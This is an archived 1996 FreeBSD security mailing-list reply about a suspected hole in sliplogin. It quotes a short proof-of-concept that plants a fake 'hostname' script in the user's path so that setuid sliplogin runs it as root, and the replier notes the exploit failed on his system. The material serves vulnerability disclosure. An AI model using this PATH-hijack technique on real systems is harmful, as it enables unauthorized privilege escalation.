Date: Mon, 12 Feb 1996 09:54:44 -0700 From: Nate Williams <nate@sri.MT.net> To: Michael Constant <mconst@ocf.Berkeley.EDU> Cc: mconst@csua.berkeley.edu, nate@sri.MT.net, freebsd-security@freebsd.org Subject: Re: sliplogin hole? Message-ID: <199602121654.JAA19323@rocky.sri.MT.net> In-Reply-To: <199602121036.CAA23693@maelstrom.Berkeley.EDU> References: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
next in thread | previous in thread | raw e-mail | index | archive | help
> Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which > is just as insecure as not changing the path at all :-) But thanks for > pointing out my misconception. Hmmm..... Maybe I am confused, although I see that piece of code used in the 'sh' sources. > The exploit as I stated it does work; it's written out in full below, > in case I didn't explain it clearly in my original letter. ... > > jrl@host% cd ~/bin > jrl@host% cat > hostname > #! /bin/sh > touch /etc/i-am-root > /bin/hostname > ^D > jrl@host% chmod 755 hostname > jrl@host% sliplogin Sjrl > starting slip login for Sjrl > > ... and by this point, the deed is done. I just tried this, and it didn't work on my box although I was allowed to run sliplogin. It dies with: sliplogin[953]: ioctl (TIOCSCTTY): Operation not permitte Which might not occur on a dial-in line. Unfortunately, I'm unable to test this out right now, but I will try it out from home. Nate
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199602121654.JAA19323>